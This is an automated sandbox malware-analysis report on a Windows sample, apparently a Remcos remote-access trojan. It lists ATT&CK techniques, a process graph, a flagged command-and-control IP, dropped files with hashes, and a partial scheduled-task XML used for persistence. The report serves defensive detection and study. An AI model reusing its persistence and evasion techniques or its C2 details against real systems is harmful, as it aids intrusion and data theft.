          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          Service Execution          		Login Hook122
          Process Injection          		12
          Software Packing          		NTDS3
          File and Directory Discovery          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Scheduled Task/Job          		1
          Timestomp          		LSA Secrets33
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials121
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Masquerading          		DCSync31
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc Filesystem3
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
          Process Injection          		Network Sniffing1
          System Owner/User Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500386 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 48 geoplugin.net 2->48 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 9 other signatures 2->56 8 SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe 7 2->8         started        12 bmkNCLNkqvOpVZ.exe 5 2->12         started        signatures3 process4 file5 36 C:\Users\user\AppData\...\bmkNCLNkqvOpVZ.exe, PE32 8->36 dropped 38 C:\...\bmkNCLNkqvOpVZ.exe:Zone.Identifier, ASCII 8->38 dropped 40 C:\Users\user\AppData\Local\...\tmpB7C4.tmp, XML 8->40 dropped 42 SecuriteInfo.com.W...21416.15434.exe.log, ASCII 8->42 dropped 58 Uses schtasks.exe or at.exe to add and modify task schedules 8->58 60 Adds a directory exclusion to Windows Defender 8->60 62 Injects a PE file into a foreign processes 8->62 14 powershell.exe 23 8->14         started        17 SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe 2 13 8->17         started        20 schtasks.exe 1 8->20         started        22 SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe 8->22         started        64 Multi AV Scanner detection for dropped file 12->64 66 Contains functionalty to change the wallpaper 12->66 68 Machine Learning detection for dropped file 12->68 70 4 other signatures 12->70 24 schtasks.exe 1 12->24         started        26 bmkNCLNkqvOpVZ.exe 12->26         started        signatures6 process7 dnsIp8 72 Loading BitLocker PowerShell Module 14->72 28 WmiPrvSE.exe 14->28         started        30 conhost.exe 14->30         started        44 172.93.220.148, 45682, 49712 XTOM-AS-JPxTomJP United States 17->44 46 geoplugin.net 178.237.33.50, 49714, 80 ATOM86-ASATOM86NL Netherlands 17->46 32 conhost.exe 20->32         started        34 conhost.exe 24->34         started        signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe32%VirustotalBrowse
          SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe32%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          geoplugin.net1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://geoplugin.net/json.gp0%URL Reputationsafe
          http://geoplugin.net/0%URL Reputationsafe
          http://geoplugin.net/json.gp/C0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://geoplugin.net/json.gpSystem320%URL Reputationsafe
          http://geoplugin.net/json.gpX0%Avira URL Cloudsafe
          http://geoplugin.net/json.gp:R0%Avira URL Cloudsafe
          http://geoplugin.net/h0%Avira URL Cloudsafe
          172.93.220.1480%Avira URL Cloudsafe
          http://geoplugin.net/h0%VirustotalBrowse
          http://geoplugin.net/json.gpX0%VirustotalBrowse
          172.93.220.1481%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          geoplugin.net
          		178.237.33.50
          		truefalseunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gpfalse
          • URL Reputation: safe
          		unknown
          172.93.220.148true
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://geoplugin.net/json.gp:RSecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://geoplugin.net/json.gpXSecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://geoplugin.net/SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://geoplugin.net/hSecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://geoplugin.net/json.gp/CSecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 00000009.00000002.2152867062.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://geoplugin.net/json.gpSystem32SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          178.237.33.50
          		geoplugin.netNetherlands
          		8455ATOM86-ASATOM86NLfalse
          172.93.220.148
          		unknownUnited States
          		4785XTOM-AS-JPxTomJPtrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1500386
          Start date and time:2024-08-28 11:37:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 8m 40s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:17
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          Detection:MAL
          Classification:mal100.rans.troj.spyw.evad.winEXE@18/12@1/2
          EGA Information:
          • Successful, ratio: 75%
          HCA Information:
          • Successful, ratio: 98%
          • Number of executed functions: 188
          • Number of non-executed functions: 193
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240000 for current running targets taking high CPU consumption

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, PID 6864 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          05:37:55API Interceptor5407284x Sleep call for process: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe modified
          05:37:57API Interceptor13x Sleep call for process: powershell.exe modified
          05:37:59API Interceptor1x Sleep call for process: bmkNCLNkqvOpVZ.exe modified
          11:37:57Task SchedulerRun new task: bmkNCLNkqvOpVZ path: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          178.237.33.50PO_304234.xlsGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          another.rtfGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          rnr.exeGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp
          Faktura.vbsGet hashmaliciousRemcosBrowse
          • geoplugin.net/json.gp

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          geoplugin.netPO_304234.xlsGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          another.rtfGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          rnr.exeGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          Faktura.vbsGet hashmaliciousRemcosBrowse
          • 178.237.33.50

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          ATOM86-ASATOM86NLPO_304234.xlsGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          another.rtfGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          rnr.exeGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          Faktura.vbsGet hashmaliciousRemcosBrowse
          • 178.237.33.50
          XTOM-AS-JPxTomJPDHL AWB 5596370080.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          DHL SHIPPING DOC 5596370080.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          AWB DHL 54900000789.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          DHL AWB 8900893000.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          SKM-2752024.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          C4zDQjrSzj.elfGet hashmaliciousUnknownBrowse
          • 45.82.236.27
          Quote List.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          b1801e102f5cb5dce9e2628bd80932a39bd57ff68d32c824ad4443f7bd00ea2d_payload.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12
          DHL AWB 890089300.exeGet hashmaliciousRemcos, PureLog StealerBrowse
          • 103.150.8.12
          DHL AWB DOCS 890089300.exeGet hashmaliciousRemcosBrowse
          • 103.150.8.12

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.log

          Download File
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.34331486778365
          Encrypted:false
          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
          MD5:1330C80CAAC9A0FB172F202485E9B1E8
          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
          Malicious:true
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bmkNCLNkqvOpVZ.exe.log

          Download File
          Process:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.34331486778365
          Encrypted:false
          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
          MD5:1330C80CAAC9A0FB172F202485E9B1E8
          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
          Malicious:false
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

          Download File
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):962
          Entropy (8bit):5.013811273052389
          Encrypted:false
          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
          Malicious:false
          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):2232
          Entropy (8bit):5.380805901110357
          Encrypted:false
          SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
          MD5:16AD599332DD2FF94DA0787D71688B62
          SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
          SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
          SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
          Malicious:false
          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_24y5o3ba.fez.psm1

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jodiitfk.bmm.psm1

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4zoiy5c.1nm.ps1

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zve2udha.ntf.ps1

          Download File
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp

          Download File
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:XML 1.0 document, ASCII text
          Category:dropped
          Size (bytes):1601
          Entropy (8bit):5.111177643265979
          Encrypted:false
          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLyxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTyv
          MD5:50D4DFE59547FD2189BB6D69C3BDD484
          SHA1:710E99B0CBEE3C46C260AF612757E39259300F45
          SHA-256:69162406931DA64721A73ACA1B6F17254077496021CD53F409ED2881D37041DA
          SHA-512:D5AFF4ACEAF6DFC6E51A75F3F0C2618375BE092580F860AB91FDC361E27BD2969261F8376EB65DFC25FDD17E7E9E65723CBFEB20231A233CEE4E3DED6CD2FA1C
          Malicious:true
          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

          C:\Users\user\AppData\Local\Temp\tmpC65B.tmp

          Download File
          Process:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          File Type:XML 1.0 document, ASCII text
          Category:dropped
          Size (bytes):1601
          Entropy (8bit):5.111177643265979
          Encrypted:false
          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLyxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTyv
          MD5:50D4DFE59547FD2189BB6D69C3BDD484
          SHA1:710E99B0CBEE3C46C260AF612757E39259300F45
          SHA-256:69162406931DA64721A73ACA1B6F17254077496021CD53F409ED2881D37041DA
          SHA-512:D5AFF4ACEAF6DFC6E51A75F3F0C2618375BE092580F860AB91FDC361E27BD2969261F8376EB65DFC25FDD17E7E9E65723CBFEB20231A233CEE4E3DED6CD2FA1C
          Malicious:false
